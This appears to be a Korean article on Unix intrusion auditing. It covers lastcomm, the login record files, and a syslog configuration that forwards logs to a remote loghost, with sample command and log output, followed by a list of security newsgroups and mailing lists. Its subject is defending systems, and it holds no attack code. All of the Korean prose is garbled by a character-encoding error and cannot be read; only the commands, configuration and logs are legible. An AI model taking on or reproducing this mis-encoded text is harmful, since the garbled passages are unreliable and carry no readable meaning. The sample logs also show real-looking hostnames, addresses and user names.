¸Õ À̾߱âÀÌÁö¸¸, ÇØÄ¿°¡ µé¾î¿Í¼ ¾î¶² ÀÏÀ» ÇÏ°í °¬´ÂÁö¸¦
¾Ë¾Æ³»±â À§Çؼ´Â lastcommÀ̶ó´Â ¸í·É¾î°¡ ÀÖ´Ù. lastcommÀº
Áö±Ý À̽ð£±îÁö ½Ã½ºÅÛ¿¡¼ ¼öÇàµÇ¾ú´ø ¸í·É¾îµéÀ» º¸¿©ÁÖ°Ô
µÈ´Ù. ¸¸¾à¿¡ lastcommÀÌ ÀÛµ¿µÇÁö ¾Ê´Â´Ù¸é ½Ã½ºÅÛ °ü¸®ÀÚ°¡ ´Ù À½ÀÇ
¸í·ÉÀ» ¼öÇàÇϵµ·Ï ÇØ¾ß ÇÑ´Ù.
% /usr/etc/accton /usr/adm/acct
% lastcomm | more
msgs ksh ttyp2 0.03 secs Thu
Mar 16 16:58
less ksh ttyp2 0.06 secs Thu
Mar 16 16:58
csh F ksh ttyp2 0.00 secs Thu
Mar 16 16:58
csh F ksh ttyp2 0.00 secs Thu
Mar 16 16:58
date ksh ttyp2 0.02 secs Thu
Mar 16 16:58
stty ksh ttyp2 0.02 secs Thu
Mar 16 16:58
stty ksh ttyp2 0.02 secs Thu
Mar 16 16:58
biff ksh ttyp2 0.02 secs Thu
Mar 16 16:58
hostname ksh ttyp2 0.02 secs
Thu Mar 16 16:58
whoami ksh ttyp2 0.03 secs Thu
Mar 16 16:58
hostname ksh ttyp2
0.02 secs Thu Mar 16 16:58
hostname ksh ttyp2 0.02 secs
Thu Mar 16 16:58
hostname ksh ttyp2 0.02 secs
Thu Mar 16 16:58
Àü¹®µÈ ÇØÄ¿¿Í À̸¦ ¸·´Â º¸¾ÈÆÀÀº Ç×»ó ¿©·¯°¡Áö ÆÄÀÏÀ»
ÀÌ¿ëÇؼ º¸¾ÈÀ» üũÇÏ°Ô µÇ¸ç, last, lastcommÀº ÇϳªÀÇ ½ÃÀÛ¿¡ ºÒ
°úÇÏ´Ù. ÀÌ ÀýÀÇ ³»¿ëÀ» Á¤¸®Çϸé, ½Ã½ºÅÛ¿¡ ·Î±×ÀÎ ÇÏ°í
·Î±×¾Æ¿ôÇÏ¸é ±× ±â·ÏÀÌ ¾îµò°¡ ³²´Â´Ù´Â °ÍÀε¥. ´ÙÀ½ÀÇ ³×°¡Áö ÆÄÀÏ ÀÌ
´ëÇ¥ÀûÀÌ´Ù.
/usr/adm/lastlog °¢ À¯Àú¸¶´Ù °¡Àå ÃÖ±ÙÀÇ ·Î±×ÀÎ ½Ã°£À»
±â·ÏÇÑ´Ù.
finger
³ª someone ¿¡ ÀÇÇØ ¾Ë ¼ö ÀÖ´Ù.
/etc/utmp
À¯Àú°¡ ·Î±×ÀÎ ÇÒ ¶§¸¶´Ù ½Ã°£À» Àû¾îµÐ´Ù.
/usr/adm/wtmp
À¯Àú°¡ ·Î±×ÀÎ/·Î±× ¾Æ¿ôÇÒ ¶§ ½Ã°£À» Àû¾îµÐ´Ù.
last
¶Ç´Â last someone ÀÇ ¸í·ÉÀ» Ãļ ³»¿ëÀ» ¾Ë¼öÀÖ´Ù.
/usr/adm/acct
À¯ÀúµéÀÌ »ç¿ëÇÏ´Â ¸í·É¾î¸¦ Àû¾îµÐ´Ù.
lastcomm
À» Ä¡¸é ³»¿ëÀ» ¾Ë ¼ö ÀÖ´Ù.
ÇÏÁö¸¸, ½ÇÁ¦·Î ÇØÄ¿µéÀº ÀÌ ¸ðµç ÆÄÀϵéÀ» Áö¿ì°í
³ª°¡´Â °ÍÀÌ º¸ÅëÀ̸ç(»ý°¢À» º¸¶ó, ³ª°¥ ¶§ ÀڱⰡ
µé¾î¿Ô´Ù´Â Áõ°Å¸¦ ÀÔ¸ê ÇÏ°í ³ª°¡´Â
°ÍÀÌ ÇØÄ¿ÀÇ ÀÔÀåÀ¸·Î ¼´Â ´ç¿¬ÇÑ °ÍÀÌ ¾Æ´Ï°Ú´Â°¡), µû¶ó¼
ÀÏÁ¤ÇÑ ½Ã°£ °£°Ý¸¶´Ù ȤÀº ÇÏ·çÀÇ ¾î´À ¶§¿¡ ¼öÇàÇÏ µµ·Ï Á¦¾îÇØÁÖ´Â
cron¸í·ÉÀ» ÀÌ¿ëÇØ °è¼Ó À§ÀÇ ÆÄÀÏÀ» ¹é¾÷À» ÇÑ´Ù¸é ÇØÄ¿¸¦
Á»´õ ¾î·Æ°Ô ¸¸µé ¼ö ÀÖ°Ú´Ù. ÀÌ´Â °ü¸®ÀÚ¿¡°Ô ÇÊ¿ä ÇÑ ºÎºÐÀÌÁö¸¸, ¾ÈÀüÇÑ
È£½ºÆ®¸¦ ¼±ÅÃÇØ log¸¸À» ³²±â´Â È£½ºÆ®¸¦ µÎ¸é ´õ¿í È®½ÇÇÏ´Ù.(ÀÌ´Â
¹°·Ð Àåºñ¿¡ ¿©À¯°¡ ÀÖÀ» ¶§ÀÇ ÀÌ¾ß ±âÀÌ´Ù) ¿¹¸¦ µé¸é,
/etc/syslog.conf ¿¡¼ Á¤ÀǸ¦ Çϵµ·Ï ÇÏÀÚ.
#
# syslog configuration file
#
define LOGHOST eve
*.err;kern.debug;auth.notice;user.none
/dev/console
mail.debug ifdef('LOGHOST',/var/log/syslog,@loghost)
mail.debug /var/log/syslog
·Î±× È£½ºÆ®¸¦ ¼³Á¤ÇÑ ¿¹¸¦ µé¾îº¸ÀÚ. ´ÙÀ½ ·Î±×´Â ·Î±×
È£½ºÆ®ÀÎ eldar ÀÇ ·Î±× ÆÄÀÏ¿¡ ±â·ÏµÈ °ÍÀÌ´Ù. elbereth,
luthien, be ren, eru, frodo, sam, aragorn, gandalf,
faramir, legolasgimli,
indigo
1,3,4,10, applicÀÌ eldar·Î ·Î±×¸¦ º¸³»µµ·Ï ¼³Á¤µÅÀÖ´Ù.
Mar 17 02:43:28 6C:eldar fingerd[17516]:
connect from baikdu.kaist.ac.kr
Mar 17 02:43:42 6D:eldar ftpd[17518]:
connection from baikdu.kaist.ac.kr
Mar 17 02:43:54 5E:eldar ftpd[17518]:
FTP LOGIN FAILED FROM
baikdu.kaist.ac.kr,
chester
Mar 17 02:44:15 6E:eldar ftpd[17518]:
FTP LOGIN FROM baikdu.kaist.ac.kr
as chester
Mar 17 09:37:16 6C:luthien.seri.re.kr
sendmail[10578]: JAA10572:
to=sysuh@kigam.re.kr, ctladdr=news
(15/15), delay=00:0 0:09,
mailer=smtp, relay=sdp.kigam.re.kr.
[134.75.144.201], stat=Sent
(JAA15213 Message accepted for delivery)
Mar 17 13:31:46 6B:frodo.seri.re.kr
Xsession: poison: login
Mar 17 13:40:32 6C:gimli.seri.re.kr
ftpd[
533]: connect from
eve.kaist.ac.kr
Mar 17 13:49:32 6D:indigo1.seri.re.kr
ftpd[533]: connection from
robin.kaist.ac.kr
ÀÌ·± ¹æ¹ý ¿Ü¿¡µµ ÆÄÀ̾î¿ù, TCP wrapper µîÀ» ÀÌ¿ëÇØ ¾Æ¿¹
¿ÜºÎ¿¡¼ÀÇ Á¢±ÙÀ» ¸·¾Æ¹ö¸± ¼ö ÀÖ´Ù. ¹°·Ð tcpdump³ª
netmonµéÀ» »ç¿ëÇØ ÀÚ½ÅÀÇ È£½ºÆ®·ÎÀÇ ¸ðµç Á¢±ÙÀ» °¨½ÃÇÒ
¼öµµ ÀÖ´Ù. ÀÌ¿Í °°ÀÌ ¹æ¾îÇÏ´Â ±â¼úµµ Á¡Á¡ °íµµÈ°¡ µÇ¾î °í¼öÁØÀÇ ÇØÄ¿°¡
¾Æ´Ï ¸é ħÅõÇϱ⠾î·Á¿î È£½ºÆ®°¡ ´Ã¾î°¡°í ÀÖ´Ù.
±× ¹«¼öÇÑ ¹ö±×µéÀ» ¸ðµÎ ¸Ó¸®¿¡ ¿Ü¾îµÎ°í À̸¦ ¸ðµÎ ÆÐÄ¡Çϱâ¶õ
»ó´çÈ÷ ¾î·Á¿î ÀÏÀÌ´Ù. ÀÌ·± °æ¿ì¿¡´Â º¸¾ÈÅøÀ» ÀÌ¿ëÇÏ¿© ü Å©¸¦ ÇÏ´Â °ÍÀÌ
¸¹Àº ½Ã°£À» Àý¾àÇÒ ¼ö ÀÖ°Ô µÈ´Ù. ´ÙÀ½È£(6¿ùÈ£)
o ´º½º±×·ì o ¸ÞÀϸµ ¸®½ºÆ®
alt.2600
cert-advisory@cert.org
alt.2600.hope.tech
ciac-listproc@llnl.gov
alt.cracks
majordomo@suburbia.net
alt.hackers
majordomo@greatcircle.com
alt.hackintosh
bugtraq-r
equest@crimelab.com
alt.hacker.malicious
majordomo@8lgm.org
alt.security
security@baikdu.kaist.ac.kr
alt.security.pgp
alt.security.ripem
comp.risks
comp.security.announce
comp.security.misc
comp.security.unix
misc.security